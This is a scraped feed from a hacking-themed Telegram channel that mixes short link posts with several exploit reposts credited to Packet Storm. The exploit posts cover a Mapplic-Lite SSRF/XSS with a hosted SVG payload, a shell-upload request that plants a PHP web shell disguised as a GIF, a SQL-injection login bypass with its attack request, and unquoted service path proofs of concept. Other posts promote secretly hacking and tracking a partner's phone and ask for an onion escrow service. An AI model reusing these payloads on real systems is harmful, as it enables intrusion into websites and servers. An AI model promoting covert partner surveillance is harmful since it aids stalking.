Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Reverse Shell Generator : Hosted Reverse Shell Generator With A Ton Of Functionality

Hosted Reverse Shell generator with a ton of functionality. Features Generate common listeners and reverse shells Raw mode to cURL shells to your machine. Button to increment the listening port number by 1 URI and Base64 encoding LocalStorage to persist your configuration Dark and Light Modes Dev It’s recommended to use the netlify dev command […]

The post Reverse Shell Generator : Hosted Reverse Shell Generator With A Ton Of Functionality appeared first on Kali Linux Tutorials.
Calling to all Pen Testers!!
https://www.reddit.com/r/Pentesting/comments/mbek6e/calling_to_all_pen_testers/

<!-- SC_OFF -->I am looking to add top talent to our UK offensive security team. I have positions at all technical levels and across various specialisms here at NCC Group. If you are an experienced Pen Tester based in the UK and interested in what we could offer you please feel free to reach out to me on [belle.kyriacou@nccgroup.com (mailto:belle.kyriacou@nccgroup.com)](mailto:belle.kyriacou@nccgroup.com (mailto:belle.kyriacou@nccgroup.com)) <!-- SC_ON --> submitted by /u/BelleKyriacou (https://www.reddit.com/user/BelleKyriacou)
[link] (https://www.reddit.com/r/Pentesting/comments/mbek6e/calling_to_all_pen_testers/) [comments] (https://www.reddit.com/r/Pentesting/comments/mbek6e/calling_to_all_pen_testers/)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Making decent money on our porn sites. 18+ only.

https://cdn-images-1.medium.com/max/1920/0*NSAqmtXOt8-Di1-v.jpg
Greetings! Hackfreaks here. It turns out that you can not only strange your boa constrictor, but also earn decent money on this. Today we…

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to hack a phone easily and remotely

To snoop your partner’s activities on their phone, several methods will be discussed. Because of this video guide, you can now learn how…

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How To Track My Husband’s Phone Secretly?

Because of this video guide, you can now learn how to read your girlfriends WhatsApp messages on an iPhone or android and have access to…

Continue reading on Medium »
Pwning PHP Websites: RFI & LFI
https://medium.com/dsc-sastra-deemed-to-be-university/pwning-php-websites-rfi-lfi-5f28e6c31b4a?source=rss------bug_bounty-5

PHP is one of the widely used languages for web development ( more than 60% ) which makes it one of the most targeted ones.Continue reading on Developer Student Clubs SASTRA » (https://medium.com/dsc-sastra-deemed-to-be-university/pwning-php-websites-rfi-lfi-5f28e6c31b4a?source=rss------bug_bounty-5)
hacking: security in practice
Escrow

Can anyone suggest to me an onion escrow service, please?

submitted by /u/yellow-sugar
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Data Protection Is a Group Effort

When every employee is well-versed in customer data privacy principles, the DPO knows the enterprise's sensitive data is in good hands.
Exploit Collector
WordPress Mapplic-Lite 1.0 SSRF / Cross Site Scripting

https://1.bp.blogspot.com/-luFAqsulr64/WWlvFAfKXLI/AAAAAAAAILI/M2y6qJlcju8Kpq9V68KpSF2h6FJoaSeWACLcBGAs/s1600/h135.png
WordPress Mapplic-Lite plugin version 1.0 suffers from a server-side request forgery vulnerability that can be leveraged to commit cross site scripting attacks.

MD5 | 8713ec5c90e3494732055a63d7db0c05

Download
#Title : Mapplic-Lite Wordpress Plugins Stored XSS Injection via SSRF
#Date : 22/03/2021
#Author : Eagle Eye
#Download : https://wordpress.org/plugins/mapplic-lite/
#Vendor Homepage : https://mapplic.com/
#Version Affected : Version 1.0
#Tested on : Google Chrome
#XSS Vuln from add/edit Map and bypass with host raw.githubusercontent.com

#1.Login as user
#2.Add Add/Edit Map
- [From Add]Enter github url with payload at "Map File (required)"
- [From Edit]Click raw and enter github url with payload

#Example [From edit]
{"mapwidth":"100","mapheight":"100","minimap":false,"clearbutton":true,"zoombuttons":true,"sidebar":false,
"search":false,"hovertip":true,"mousewheel":true,"fullscreen":false,"deeplinking":true,"mapfill":false,
"zoom":true,"alphabetic":false,"zoomlimit":"3","action":"tooltip","categories":[],
"levels":[{"id":"my-map","title":"My Map","map":"
https://raw.githubusercontent.com/Aizat197/xss_test/main/xss.svg
","minimap":"","locations":[]}]}

#Payload
<svg
xmlns:xlink="http://www.w3.org/1999/xlink" x="0px"
y="0px" width="960px" height="600px" viewBox="0 0 960 600"
enable-background="new 0 0 960 600" xml:space="preserve">

Source:packetstormsecurity.com
Exploit Collector
ELAN Touchpad 15.2.13.1_X64_WHQL Unquoted Service Path

https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
ELAN Touchpad version 15.2.13.1_X64_WHQL suffers from an unquoted service path vulnerability.

MD5 | b1190def32e41002204b0b182bd559ed

Download
# Exploit Title: ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path
# Exploit Author : SamAlucard
# Exploit Date: 2021-03-22
# Vendor : ELAN Microelectronics
# Version : ELAN Touchpad 15.2.13.1_X64_WHQL
# Vendor Homepage : http://www.emc.com.tw/
# Tested on OS: Windows 8

#This software installs EDTService.exe, version 11.10.2.1

#Analyze PoC :
==============
C:\>sc qc ETDService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ETDService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Elantech\ETDService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Elan Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

Source:packetstormsecurity.com
Exploit Collector
Online Reviewer Management System 1.0 Shell Upload

https://3.bp.blogspot.com/-3DxkerR7uq4/WWlu9h9UGfI/AAAAAAAAIJw/dRDCcwrw3XEGYQWUo-AXJEEU7FQ8iTgpACLcBGAs/s1600/h115.png
Online Reviewer Management System version 1.0 suffers from a remote shell upload vulnerability.

MD5 | 9d3b419524c9b1d3f62ecd6becf032ba

Download

# Exploit Title: Online Reviewer Management System Shell Upload
# Exploit Author: th3d1gger
# Vendor Homepage: https://sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/reviewer_0.zip
# Version: 1.0
# Tested on Windows 10
@attack request

POST /admins/assessments/databank/btn_functions.php?action=add HTTP/1.1

Host: reviewmngmnt.olly

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------28762627066859903521570508233

Content-Length: 1574

Origin: http://reviewmngmnt.olly
Connection: close

Referer: http://reviewmngmnt.olly/admins/assessments/databank/index.php

Cookie: PHPSESSID=3he3in87240vbdqshdfu75b7qi

Upgrade-Insecure-Requests: 1
-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="difficulty_id"
1

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="test_desc"
Agriculture

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="test_subject"
Animal Science

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="description"
y8

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="option_a"
y8

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="option_b"
y8

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="option_c"
y8

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="option_d"
y8

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="answer"
A

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="personImage"; filename="y8.gif.php.php"

Content-Type: application/octet-stream
GIF89a;

tested with b374k.php
?>
-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="btnAddQuestion"
Save

-----------------------------28762627066859903521570508233--

Source:packetstormsecurity.com
Exploit Collector
ActivIdentity 8.2 Unquoted Service Path

https://3.bp.blogspot.com/-DuI_c3FaBwQ/WWlvaHZ97uI/AAAAAAAAIO8/N3071iSnuSkvxUt6NQQ_hoJeYx39DTurQCLcBGAs/s1600/h61.png
ActivIdentity version 8.2 suffers from an unquoted service path vulnerability.

MD5 | be881a342b05db97805bd7ed970cc9f8

Download
# Exploit Title: ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path
# Exploit Author : SamAlucard
# Exploit Date: 2021-03-21
# Software Version : ActivIdentity 8.2
# Vendor Homepage : https://www.hidglobal.com/
# Tested on OS: Windows 7 Pro

# ActivIdentity was Acquired by HID Global in Octuber 2010

#ActivClient is a desktop authentication software that uses smarts cards and readers
# for enterprise, government and commercial establishments

#Analyze PoC :
==============

C:\Users\DSAdsi>sc qc ac.sharedstore
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ac.sharedstore
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Common
Files\ActivIdentity\ac.sharedstore.exe
GRUPO_ORDEN_CARGA : SmartCardGroup
ETIQUETA : 0
NOMBRE_MOSTRAR : ActivIdentity Shared Store Service
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem


Source:packetstormsecurity.com
Exploit Collector
Online Reviewer Management System 1.0 SQL Injection

https://4.bp.blogspot.com/-f53oTn8LDZ0/WWlvMw9CK1I/AAAAAAAAIMU/jEtmPtbvTXsSkP0BJUzx6KZQIUlovIO9gCLcBGAs/s1600/h20.png
Online Reviewer Management System version 1.0 remote SQL injection exploit that allows for authentication bypass.

MD5 | 4d991079bac378d19772c72a1fd43234

Download
# Exploit Title: Online Reviewer Management System Authentication ByPass
# Exploit Author: th3d1gger
# Vendor Homepage: https://sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/reviewer_0.zip
# Version: 1.0
# Tested on Windows 10
#Vulnerable Source Code
#index.php

if(isset($_REQUEST['btn-login'])){

$username = $_REQUEST['username'];
$password = $_REQUEST['password'];

$user_retrieve = $conn -> prepare("SELECT * FROM users where username = '$username' and password = '$password'");
$user_retrieve->execute();
if($user_retrieve->rowCount() > 0){
while ($row = $user_retrieve->fetch()) {
$_SESSION['usertype_id'] = $row['usertype_id'];
$_SESSION['user_id'] = $row['user_id'];
$_SESSION['firstname'] = $row['fname'];
$_SESSION['middlename'] = $row['mname'];
$_SESSION['lastname'] = $row['lname'];
$_SESSION['course'] = $row['course'];

$usertype_id = $_SESSION['usertype_id'];

if($usertype_id == 3){
echo "";

}
elseif ($usertype_id == 1 || $usertype_id == 2 ) {
echo "";

}

}
}
#Attack Request
POST / HTTP/1.1

Host: reviewmngmnt.olly

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 78

Origin: http://reviewmngmnt.olly/

Connection: close

Referer: http://reviewmngmnt.olly/

Cookie: PHPSESSID=3he3in87240vbdqshdfu75b7qi

Upgrade-Insecure-Requests: 1
username=%27+or+%271%27%3D%271&password=%27+or+%271%27%3D%271&btn-login=Log+In

Source:packetstormsecurity.com